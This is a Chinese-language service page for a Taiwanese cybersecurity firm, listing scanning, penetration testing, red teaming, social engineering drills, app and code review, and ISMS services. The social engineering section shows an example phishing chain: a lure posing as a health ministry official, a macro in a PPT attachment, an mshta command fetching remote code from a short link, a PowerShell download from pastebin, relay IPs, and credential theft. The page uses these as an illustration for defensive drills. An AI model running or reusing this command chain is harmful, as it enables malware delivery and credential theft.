戰國策365天全年無休服務專線 0800-003-191

戰國策

資安服務

Name: 戰國策集團 - NSS GROUP
Address: 南京東路二段150號10樓, 中山區, 100, 台灣
Telephone: 0800-003-191

戰國策資安服務以專業技術保護您的資源，作為一家專業資訊安全公司，戰國策資安服務致力於保護企業和個人的資源，提供多層次、全方位的安全保障。戰國策資安服務的資訊安全管理解決方案提供多項功能，包括弱點掃描服務、滲透測試服務、紅隊演練服務、資安健診服務、社交工程服務、APP檢測服務、源碼檢測服務、ISMS導入等，讓用戶能夠全面掌握自身的資安風險，針對性地進行資安強化。

資安服務總覽

資安服務特色

專業團隊

我們的專家團隊具有多年的資訊安全經驗，持有國際認證，確保提供給您最專業的建議和解決方案。

客製化服務

了解到每家企業的需求都是獨特的，我們提供客製化的資安方案，確保符合您的業務需求和預算。

弱點掃描服務

弱點掃描(Vulnerability Assessment, VA)指的是針對企業網站、內部伺服器或網路設備進行泛用性掃描，並發掘已知的系統弱點。
接著深入探討、分析、調整並排除弱點掃描的結果報告，並以此評估企業內部環境之風險並提供資安建議方案，確保企業之關鍵設備的安全性維持在最佳狀態、等級。最後，依照各企業單位之需求協助

STEP 01

專案啟動

專案需求確認，並完成環境檢視

STEP 02

弱點掃描

利用專案掃描工具進行遠端(或現場) 檢測

STEP 03

檢測分析

針對掃描結果進行分析

STEP 04

修正建議

綜整掃描結果及意見回復

STEP 05

專案完成

修復完畢，依單位需求評斷是否進行複測

弱點掃描

主機/伺服器

使用Tenable Nessus工具
針對伺服器或網路設備進行掃描
發覺已知的系統弱點及後門程式
深入分析、調整及排除誤判狀況
評估環境之風險等級
提供修補建議

網站/系統

滲透測試服務

滲透測試(Penetration Test, PT)為針對企業所提供之網站應用程式進行測試，確認網站安全性並設法取得存取權與內部機敏資訊。
通常依循OWASP TOP 10以及SANS TOP 20等準則設計一系列檢測流程。利用多種深入檢測工具輔助進行測試，包含SQL Injection及其他弱點檢測，並發現系統脆弱點。
最後，依照單位之檢測結果提供詳細的解決方案，持續提高客戶網站之安全等級。

STEP 01

前置準備

專案需求確認，並完成環境檢視

STEP 02

專家盲測

以專家盲測方式尋找可能弱點

STEP 03

深度滲透

利用多種工具掃描協助進行檢測

STEP 04

弱點驗證

全弱點進行誤判排除及二次驗證

STEP 05

結果評估

執行結果與整體建議

滲透測試

分內網 / 外網執行
以駭客思維與手法嘗試入侵目標環境
找出各種潛在的漏洞
彌補自動化掃描的不足
提出建議的安全修正方式
藉由複測確認各項漏洞修補狀況
檢測注重不影響服務為主

網站/系統 & 網路環境

紅隊演練服務

紅隊演練 (Red Teaming) 係用以補足傳統滲透測試容易忽略之邊界防禦，以及基於人為疏失之佈署盲點，利用公開資訊、社交網路、暗網等搜集目標情資、結合資訊安全專家之專業知識、攻防技術及駭客工具資料庫，對於雙方所約定之攻擊目標與組織，採取無所不用其極的方法進行入侵演練，同時可驗證防守方(藍隊)的偵測與回應能力。

為什麼需要紅隊演練?

藉由紅隊演練過程與結果，強化組織藍隊：

紅隊演練涵蓋攻擊流程範圍：

資安健診服務

資安健診係依循各式標準與規範，針對客戶單位環境進行全面性的安全檢測。並檢視客戶單位環境內各項資安防護能力，發掘不安全的設定與潛在風險，持續提升企業單位整體資安防護等級。

主要檢測目標項目包含：網路架構審視、有線網路惡意活動檢測、使用者及伺服器主機之惡意程式檢測與更新檢視、各項安全性設定檢視。

STEP 01

專案啟動

專案需求確認，並確認執行範圍

STEP 02

資續蒐集

蒐集作業系統、應用程式、環境資訊等多項相關訊息

STEP 03

各項檢測

藉由多項工具進行深入檢測

STEP 04

資料分析

以專業知識統整分析所得結果資料

STEP 05

結果評估

綜整執行結果評估

資安健診-共同供應契約

社交工程服務

社交工程演練主要是利用測試手法配合電子郵件或簡訊的方式針對企業單位進行測試。
為了提升企業單位內部員工的資安意識以及對於受測使用者面對社交工程攻擊與惡意訊息時的防護與警覺能力。
通常會簽訂保密合約，在安全的範圍內，由服務商實施社交工程演練，提升單位員工的資安意識及對於網路安全防護之警覺性

偽裝成衛福部官員信
95.216.8.75 (寄件來源)

附件檔案為PPT
Covid-19防护措施.ppt

使用巨集載入後續內容

MSHTA mshta http://%20%20@j.mp/asda kdxassddodkasodkaos

POWERSHELL
下載並植入pastebin.com內容

回報中繼站
198.23.200.239
竊取帳號密碼
關閉資安防護

APP檢測服務

依據OWASP MOBILE TOP 10、行動應用App基本資安檢測基準等規範，針對iOS/Android平台之App進行檢測。
透過多種檢測工具針對App進行解譯、反編碼程序等分析，並評估其內容是否有機敏資訊洩漏或違反規範等風險。除了檢測App本身是否含有漏洞風險之外，為確認App傳輸之機敏資料確實受到保護，降低敏感資料在行動裝置傳輸時外洩的機會。
最後，透過檢測結果產出測試報告，讓受測單位了解自身App封包傳輸的安全狀況。

STEP 01

專案啟動

專案需求確認，基本資訊填回單、完成受測樣態檢視

STEP 02

資續蒐集

取得受測APP、判斷受測樣太完整性、確認受測樣態版本

STEP 03

靜態檢測

利用多種工具分析協助、原始碼解析、機敏資訊查找

STEP 04

動態檢測

執行封包攔截、分析傳輸封包內容、分析執行記錄

STEP 05

修正建議

綜整弱點與合規檢視、執行結果評估、產出服務報告

APP檢測服務 – 檢測基準

遵循經濟部工業局 (Ministry of Economic Affairs, MOEA) 於 108 年 9 月修訂之「 行動應用 App 基本資安檢測基準 V 3.1 」版本。此檢測基準參考了 OWASP MOBILE TOP 10 、 CSA MAST 及 NIST 等國際規範為以測試並確保受測單位之行動應用程式之安全性。

檢測分類	檢測說明
L1	無須使用者身分鑑別之行動應用程式，須檢測項目為22項
L2	須使用者身分鑑別之行動應用程式，須檢測之項目為25項
L3	含有交易行為之行動應用程式，須檢測之項目共為30項

源碼檢測服務

原始碼檢測指的就是白箱測試，遵循OWASP TOP 10、SANS/FBI及CWE等各項國際標準規範，針對各項主流之程式語言進行弱點掃描。
透過應用系統進行整合性測試，確保傳輸連線、加密/編碼方式以及敏感資料是否已妥善防護。避免因程式碼邏輯衝突產生安全漏洞隱憂或是避免網站及應用系統遭受攻擊、入侵。
最後，再根據檢測結果提供適當的修復方案建議給客戶，確保客戶端所提供之服務能進一步保障用戶敏感資料。

STEP 01

專案啟動

專案需求確認，並完成環境檢視

STEP 02

目標確認

分析及確認目標系統之運作狀況

STEP 03

源碼分析

利用多種工具分析對原始碼進行蒐集與分析

STEP 04

修正建議

檢視弱點並進行修正評估與優先建議

STEP 05

報告交付

正式報告產出並完成交付說明

ISMS導入

驗證服務

ISMS(Information Security Management System)是一套有系統地分析與管理資訊安全風險的方法。透過制度化的控制方法，把資訊風險降低到企業可接受的程度內，以風險管理的觀念保護企業中資訊資產的機密性、完整性及可用性。

透過國際標準化組織ISO(International Organization for Standardization)所發布的ISO 27001資訊安全管理框架，協助企業組織管理和保護資訊資產，確保其安全無慮。

STEP 01

現況分析與診斷

STEP 02

風險評鑑與管理

STEP 03

建立資訊安全管理系統

STEP 04

制度落實與實施稽核

STEP 05

稽核作業與驗證

資安服務成功案例

這三個成功案例都展示了戰國策資安防護服務的效果和價值。無論是電商、金融還是科技產業，戰國策都能提供專業和全面的資安解決方案，確保企業的資訊資產得到充分保護。

某電商巨頭網站

背景：隨著線上購物的普及，某電商巨頭網站成為台灣最大的電商平台之一。每日有數百萬的交易流量，但也因此成為駭客的主要目標。

解決方案：戰國策為某電商巨頭網站提供了全面的弱點掃描服務，並進行滲透測試，模擬真實的駭客攻擊。此外，透過源碼檢測服務，確保百貨網的網站和APP無任何資安隱患。

結果：百貨網成功防範了多次的駭客攻擊，並提高了客戶的購物信心。此外，透過戰國策的資安健診服務，某電商巨頭網站持續優化其資安策略，確保交易安全。

金融機構：某銀行

背景：某銀行是台灣的主要金融機構之一，擁有龐大的客戶資料和交易紀錄。但近年來，金融業成為駭客攻擊的主要目標，某銀行亦不例外。

解決方案：戰國策為某銀行提供了紅隊演練服務，模擬真實的資安攻擊情境，測試銀行的資安防護措施和應變機制。同時，透過ISMS導入，建立完善的資訊安全管理體系。

結果：某銀行成功抵禦了多次的資安威脅，並提高了其資安管理的成熟度。客戶對銀行的信任度大幅提升，且銀行的業務運營更加順利。

某科技公司

背景：某科技是一家提供雲端解決方案的科技公司。隨著業務的擴展，公司的資料中心和雲端服務成為駭客的攻擊目標。

解決方案：戰國策為某科技提供了APP檢測服務和社交工程服務，確保公司的應用程式和員工都有足夠的資安意識和防護能力。此外，透過資安健診服務，評估公司的資安健康狀況，並提供改善建議。

結果：某科技成功避免了多次的資安及駭客事件，並提高了其雲端服務的安全性。客戶對公司的服務更加放心，業務量也有顯著的增長

若貴公司需要資安服務，歡迎致電0800-003-191或填寫以下聯絡表單或用官方 LINE (ID:@119m) 與本公司聯繫我們的網路顧問在24小時內主動與您連繫，資料經確認無誤後，戰國策會依貴公司產業免費規劃一份網路行銷提案書，助您在網路世界稱霸！同時贈送戰國策1,000元儲值金(限企業客戶，儲值金可購買戰國策所有服務，網址註冊服務除外)